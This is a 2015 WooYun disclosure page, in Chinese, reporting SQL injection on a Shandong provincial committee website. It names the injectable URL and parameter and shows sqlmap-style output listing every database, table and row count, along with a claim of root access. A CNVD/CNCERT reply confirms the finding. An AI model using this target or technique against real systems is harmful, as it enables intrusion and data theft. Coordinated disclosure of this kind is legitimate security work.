山东省某工作委员会存在SQL注射 | wooyun-2015-094967| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094967

漏洞标题：山东省某工作委员会存在SQL注射

漏洞作者：路人甲

提交时间：2015-02-03 13:50

修复时间：2015-03-20 13:52

公开时间：2015-03-20 13:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-03：细节已通知厂商并且等待厂商处理中
2015-02-06：厂商已经确认，细节仅向厂商公开
2015-02-16：细节向核心白帽子及相关领域专家公开
2015-02-26：细节向普通白帽子公开
2015-03-08：细节向实习白帽子公开
2015-03-20：细节向公众公开

简要描述：

这个算政府站么

详细说明：

山东省关心下一代工作委员会
http://www.sdggww.com/show_news.php?id=158

看数据吧

available databases [19]:
[*] blyj
[*] ggw
[*] hcyy
[*] hyfs
[*] hyfs_bak
[*] information_schema
[*] jmwy
[*] klyjzyz
[*] ldgc
[*] mays
[*] mysql
[*] performance_schema
[*] qhdata
[*] qiaohu_data
[*] qlbz
[*] test
[*] tr_d
[*] ysmg_d
[*] yssl

Database: hyfs_bak
[97 tables]
+----------------------------------------------+
| dede_addon17                                 |
| dede_addonarticle                            |
| dede_addonimages                             |
| dede_addoninfos                              |
| dede_addonshop                               |
| dede_addonsoft                               |
| dede_addonspec                               |
| dede_addonvideo                              |
| dede_admin                                   |
| dede_admintype                               |
| dede_advancedsearch                          |
| dede_arcatt                                  |
| dede_arccache                                |
| dede_archives                                |
| dede_arcmulti                                |
| dede_arcrank                                 |
| dede_arctiny                                 |
| dede_arctype                                 |
| dede_area                                    |
| dede_channeltype                             |
| dede_co_htmls                                |
| dede_co_mediaurls                            |
| dede_co_note                                 |
| dede_co_onepage                              |
| dede_co_urls                                 |
| dede_diyforms                                |
| dede_dl_log                                  |
| dede_downloads                               |
| dede_erradd                                  |
| dede_feedback                                |
| dede_flink                                   |
| dede_flinktype                               |
| dede_freelist                                |
| dede_guestbook                               |
| dede_homepageset                             |
| dede_keywords                                |
| dede_log                                     |
| dede_member                                  |
| dede_member_company                          |
| dede_member_feed                             |
| dede_member_flink                            |
| dede_member_friends                          |
| dede_member_group                            |
| dede_member_guestbook                        |
| dede_member_model                            |
| dede_member_msg                              |
| dede_member_operation                        |
| dede_member_person                           |
| dede_member_pms                              |
| dede_member_snsmsg                           |
| dede_member_space                            |
| dede_member_stow                             |
| dede_member_stowtype                         |
| dede_member_tj                               |
| dede_member_type                             |
| dede_member_vhistory                         |
| dede_moneycard_record                        |
| dede_moneycard_type                          |
| dede_mtypes                                  |
| dede_multiserv_config                        |
| dede_myad                                    |
| dede_myadtype                                |
| dede_mynews                                  |
| dede_mytag                                   |
| dede_payment                                 |
| dede_plugins_config                          |
| dede_plus                                    |
| dede_plus_baidusitemap_list                  |
| dede_plus_baidusitemap_setting               |
| dede_plus_changyan_importids                 |
| dede_plus_changyan_insertids                 |
| dede_plus_changyan_setting                   |
| dede_purview                                 |
| dede_pwd_tmp                                 |
| dede_ratings                                 |
| dede_scores                                  |
| dede_search_cache                            |
| dede_search_keywords                         |
| dede_sgpage                                  |
| dede_shops_delivery                          |
| dede_shops_orders                            |
| dede_shops_products                          |
| dede_shops_userinfo                          |
| dede_softconfig                              |
| dede_sphinx                                  |
| dede_stepselect                              |
| dede_sys_enum                                |
| dede_sys_module                              |
| dede_sys_set                                 |
| dede_sys_task                                |
| dede_sysconfig                               |
| dede_tagindex                                |
| dede_taglist                                 |
| dede_uploads                                 |
| dede_verifies                                |
| dede_vote                                    |
| dede_vote_member                             |
+----------------------------------------------+
Database: ggw
[29 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: qlbz
[30 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| dy_page                                      |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: hcyy
[30 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| lb_pic                                       |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: klyjzyz
[29 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| log                                          |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| review                                       |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: qiaohu_data
[45 tables]
+----------------------------------------------+
| user                                         |
| act_type                                     |
| active                                       |
| active_bm                                    |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| city_type                                    |
| company                                      |
| ddmessage                                    |
| del                                          |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| hd                                           |
| hd_type                                      |
| hy_register                                  |
| job                                          |
| job_type                                     |
| log                                          |
| ly                                           |
| mem_yuyue                                    |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| pros                                         |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
| xh_info                                      |
| yjmessage                                    |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: qhdata
[45 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| base                                         |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| bwg                                          |
| bwg_btype                                    |
| bwg_type                                     |
| bwginfo                                      |
| company                                      |
| ddmessage                                    |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| jfjl                                         |
| job                                          |
| job_type                                     |
| job_yp                                       |
| log                                          |
| new_btype                                    |
| new_stype                                    |
| new_type                                     |
| newmessage                                   |
| news                                         |
| o_user                                       |
| page_type                                    |
| pinglun                                      |
| qymessage                                    |
| sd_members                                   |
| spage                                        |
| sqmessage                                    |
| srmessage                                    |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| tsmessage                                    |
| wsbb                                         |
| xdmessage                                    |
| yjmessage                                    |
| zlzs                                         |
| zlzs_type                                    |
+----------------------------------------------+
Database: jmwy
[29 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: ldgc
[35 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| del                                          |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| job                                          |
| job_type                                     |
| log                                          |
| mem_yuyue                                    |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| pros                                         |
| sd_members                                   |
| sjlm_sq                                      |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: mays
[31 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| dy_page                                      |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| product                                      |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: ysmg_d
[30 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| dy_page                                      |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| pros                                         |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: hyfs
[88 tables]
+----------------------------------------------+
| dede_addonarticle                            |
| dede_addonimages                             |
| dede_addoninfos                              |
| dede_addonshop                               |
| dede_addonsoft                               |
| dede_addonspec                               |
| dede_admin                                   |
| dede_admintype                               |
| dede_advancedsearch                          |
| dede_arcatt                                  |
| dede_arccache                                |
| dede_archives                                |
| dede_arcmulti                                |
| dede_arcrank                                 |
| dede_arctiny                                 |
| dede_arctype                                 |
| dede_area                                    |
| dede_channeltype                             |
| dede_co_htmls                                |
| dede_co_mediaurls                            |
| dede_co_note                                 |
| dede_co_onepage                              |
| dede_co_urls                                 |
| dede_diyforms                                |
| dede_dl_log                                  |
| dede_downloads                               |
| dede_erradd                                  |
| dede_feedback                                |
| dede_flink                                   |
| dede_flinktype                               |
| dede_freelist                                |
| dede_homepageset                             |
| dede_keywords                                |
| dede_log                                     |
| dede_member                                  |
| dede_member_company                          |
| dede_member_feed                             |
| dede_member_flink                            |
| dede_member_friends                          |
| dede_member_group                            |
| dede_member_guestbook                        |
| dede_member_model                            |
| dede_member_msg                              |
| dede_member_operation                        |
| dede_member_person                           |
| dede_member_pms                              |
| dede_member_snsmsg                           |
| dede_member_space                            |
| dede_member_stow                             |
| dede_member_stowtype                         |
| dede_member_tj                               |
| dede_member_type                             |
| dede_member_vhistory                         |
| dede_moneycard_record                        |
| dede_moneycard_type                          |
| dede_mtypes                                  |
| dede_multiserv_config                        |
| dede_myad                                    |
| dede_myadtype                                |
| dede_mytag                                   |
| dede_payment                                 |
| dede_plus                                    |
| dede_plus_changyan_setting                   |
| dede_purview                                 |
| dede_pwd_tmp                                 |
| dede_ratings                                 |
| dede_scores                                  |
| dede_search_cache                            |
| dede_search_keywords                         |
| dede_sgpage                                  |
| dede_shops_delivery                          |
| dede_shops_orders                            |
| dede_shops_products                          |
| dede_shops_userinfo                          |
| dede_softconfig                              |
| dede_sphinx                                  |
| dede_stepselect                              |
| dede_sys_enum                                |
| dede_sys_module                              |
| dede_sys_set                                 |
| dede_sys_task                                |
| dede_sysconfig                               |
| dede_tagindex                                |
| dede_taglist                                 |
| dede_uploads                                 |
| dede_verifies                                |
| dede_vote                                    |
| dede_vote_member                             |
+----------------------------------------------+
Database: yssl
[30 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| dy_page                                      |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: blyj
[28 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| apply                                        |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| f_type                                       |
| flink                                        |
| log                                          |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Database: tr_d
[29 tables]
+----------------------------------------------+
| user                                         |
| ad                                           |
| ad_type                                      |
| base                                         |
| bm_info                                      |
| bs                                           |
| bs_btype                                     |
| bs_type                                      |
| company                                      |
| dl_type                                      |
| download                                     |
| dy_page                                      |
| f_type                                       |
| flink                                        |
| log                                          |
| message                                      |
| new                                          |
| new_btype                                    |
| new_type                                     |
| news                                         |
| o_user                                       |
| page_type                                    |
| sd_members                                   |
| spage                                        |
| syimg                                        |
| sys                                          |
| tb_down                                      |
| tb_type                                      |
| wsbb                                         |
+----------------------------------------------+
Database: ggw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| news                                  | 696     |
| log                                   | 372     |
| o_user                                | 34      |
| new_btype                             | 14      |
| new_type                              | 13      |
| flink                                 | 10      |
| ad                                    | 3       |
| `user`                                | 2       |
| ad_type                               | 2       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
| message                               | 1       |
| page_type                             | 1       |
+---------------------------------------+---------+
Database: qlbz
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 392     |
| news                                  | 181     |
| new_type                              | 45      |
| o_user                                | 34      |
| dy_page                               | 21      |
| new_btype                             | 14      |
| flink                                 | 8       |
| ad                                    | 5       |
| f_type                                | 5       |
| `user`                                | 2       |
| ad_type                               | 2       |
| page_type                             | 2       |
| bm_info                               | 1       |
| company                               | 1       |
| message                               | 1       |
+---------------------------------------+---------+
Database: hcyy
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 449     |
| news                                  | 215     |
| new_type                              | 36      |
| o_user                                | 34      |
| new_btype                             | 14      |
| ad                                    | 7       |
| flink                                 | 6       |
| lb_pic                                | 5       |
| ad_type                               | 4       |
| bm_info                               | 3       |
| page_type                             | 3       |
| `user`                                | 1       |
| company                               | 1       |
| f_type                                | 1       |
| message                               | 1       |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| setup_consumers                       | 8       |
| performance_timers                    | 5       |
| setup_timers                          | 1       |
+---------------------------------------+---------+
Database: ysmg_d
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 328     |
| o_user                                | 34      |
| dy_page                               | 22      |
| new_type                              | 17      |
| new_btype                             | 14      |
| news                                  | 12      |
| pros                                  | 12      |
| flink                                 | 11      |
| ad                                    | 2       |
| page_type                             | 2       |
| `user`                                | 1       |
| ad_type                               | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
+---------------------------------------+---------+
Database: klyjzyz
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| news                                  | 431     |
| log                                   | 320     |
| o_user                                | 145     |
| new_btype                             | 42      |
| new_type                              | 13      |
| flink                                 | 7       |
| `user`                                | 6       |
| ad_type                               | 4       |
| ad                                    | 3       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
| page_type                             | 1       |
+---------------------------------------+---------+
Database: qiaohu_data
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 340     |
| news                                  | 22      |
| new_btype                             | 14      |
| flink                                 | 10      |
| o_user                                | 10      |
| ad                                    | 8       |
| mem_yuyue                             | 8       |
| new_type                              | 8       |
| ddmessage                             | 6       |
| ad_type                               | 5       |
| message                               | 5       |
| hd                                    | 4       |
| job                                   | 4       |
| pros                                  | 4       |
| page_type                             | 3       |
| city_type                             | 2       |
| f_type                                | 2       |
| hd_type                               | 2       |
| job_type                              | 2       |
| `user`                                | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| yjmessage                             | 1       |
+---------------------------------------+---------+
Database: jmwy
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 368     |
| news                                  | 262     |
| new_type                              | 81      |
| flink                                 | 41      |
| o_user                                | 34      |
| new_btype                             | 14      |
| f_type                                | 7       |
| ad                                    | 4       |
| ad_type                               | 4       |
| message                               | 3       |
| `user`                                | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| page_type                             | 1       |
+---------------------------------------+---------+
Database: qhdata
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bwginfo                               | 673     |
| log                                   | 336     |
| news                                  | 273     |
| jfjl                                  | 203     |
| o_user                                | 196     |
| bwg                                   | 91      |
| bwg_btype                             | 37      |
| sqmessage                             | 37      |
| page_type                             | 20      |
| new_btype                             | 17      |
| xdmessage                             | 15      |
| new_stype                             | 13      |
| zlzs                                  | 10      |
| job                                   | 8       |
| srmessage                             | 8       |
| ddmessage                             | 5       |
| bwg_type                              | 4       |
| new_type                              | 4       |
| `user`                                | 2       |
| ad                                    | 2       |
| ad_type                               | 2       |
| f_type                                | 2       |
| job_type                              | 2       |
| zlzs_type                             | 2       |
| company                               | 1       |
+---------------------------------------+---------+
Database: blyj
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 363     |
| news                                  | 114     |
| o_user                                | 34      |
| new_type                              | 25      |
| new_btype                             | 14      |
| flink                                 | 8       |
| ad                                    | 4       |
| ad_type                               | 4       |
| `user`                                | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
| page_type                             | 1       |
+---------------------------------------+---------+
Database: ldgc
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 360     |
| news                                  | 63      |
| new_type                              | 58      |
| new_btype                             | 14      |
| o_user                                | 10      |
| mem_yuyue                             | 8       |
| flink                                 | 7       |
| page_type                             | 5       |
| pros                                  | 5       |
| ad                                    | 4       |
| ad_type                               | 4       |
| job                                   | 4       |
| sjlm_sq                               | 4       |
| job_type                              | 2       |
| `user`                                | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
| message                               | 1       |
+---------------------------------------+---------+
Database: mays
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 378     |
| news                                  | 37      |
| o_user                                | 34      |
| new_type                              | 24      |
| dy_page                               | 19      |
| new_btype                             | 14      |
| ad                                    | 10      |
| product                               | 7       |
| ad_type                               | 3       |
| `user`                                | 2       |
| page_type                             | 2       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
| flink                                 | 1       |
| message                               | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1028    |
| help_topic                            | 508     |
| help_keyword                          | 465     |
| help_category                         | 38      |
| `user`                                | 2       |
| db                                    | 1       |
| proxies_priv                          | 1       |
+---------------------------------------+---------+
Database: hyfs
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_sysconfig                        | 155     |
| dede_myad                             | 20      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_plus_changyan_setting            | 9       |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_sys_module                       | 7       |
| dede_channeltype                      | 6       |
| dede_plus                             | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_flink                            | 3       |
| dede_moneycard_type                   | 3       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_homepageset                      | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: yssl
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 340     |
| news                                  | 49      |
| o_user                                | 34      |
| new_type                              | 17      |
| dy_page                               | 16      |
| new_btype                             | 14      |
| flink                                 | 9       |
| message                               | 4       |
| `user`                                | 2       |
| ad                                    | 2       |
| f_type                                | 2       |
| page_type                             | 2       |
| ad_type                               | 1       |
| bm_info                               | 1       |
| company                               | 1       |
+---------------------------------------+---------+
Database: hyfs_bak
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_sysconfig                        | 157     |
| dede_uploads                          | 76      |
| dede_archives                         | 56      |
| dede_arctiny                          | 56      |
| dede_addonarticle                     | 40      |
| dede_plugins_config                   | 32      |
| dede_arctype                          | 20      |
| dede_myad                             | 20      |
| dede_addonshop                        | 16      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_plus_changyan_setting            | 9       |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_sys_module                       | 8       |
| dede_plus                             | 7       |
| dede_plus_baidusitemap_setting        | 7       |
| dede_channeltype                      | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_flink                            | 3       |
| dede_moneycard_type                   | 3       |
| dede_erradd                           | 2       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_downloads                        | 1       |
| dede_homepageset                      | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 5746    |
| STATISTICS                            | 843     |
| TABLES                                | 683     |
| PARTITIONS                            | 665     |
| KEY_COLUMN_USAGE                      | 615     |
| TABLE_CONSTRAINTS                     | 589     |
| SESSION_VARIABLES                     | 268     |
| GLOBAL_STATUS                         | 265     |
| SESSION_STATUS                        | 265     |
| GLOBAL_VARIABLES                      | 257     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| CHARACTER_SETS                        | 39      |
| USER_PRIVILEGES                       | 29      |
| PLUGINS                               | 20      |
| SCHEMATA                              | 19      |
| ENGINES                               | 9       |
| SCHEMA_PRIVILEGES                     | 4       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+
Database: tr_d
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| log                                   | 303     |
| o_user                                | 34      |
| news                                  | 15      |
| new_btype                             | 14      |
| dy_page                               | 13      |
| flink                                 | 12      |
| new_type                              | 5       |
| message                               | 4       |
| ad                                    | 3       |
| page_type                             | 2       |
| `user`                                | 1       |
| ad_type                               | 1       |
| bm_info                               | 1       |
| company                               | 1       |
| f_type                                | 1       |
+---------------------------------------+---------+

root权限

漏洞证明：

如上

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-02-06 14:36

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给山东分中心，由其后续协调网站管理部门处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094967

漏洞标题：山东省某工作委员会存在SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-02-03 13:50

修复时间：2015-03-20 13:52

公开时间：2015-03-20 13:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094967

漏洞标题：山东省某工作委员会存在SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-02-03 13:50

修复时间：2015-03-20 13:52

公开时间：2015-03-20 13:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-094967"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云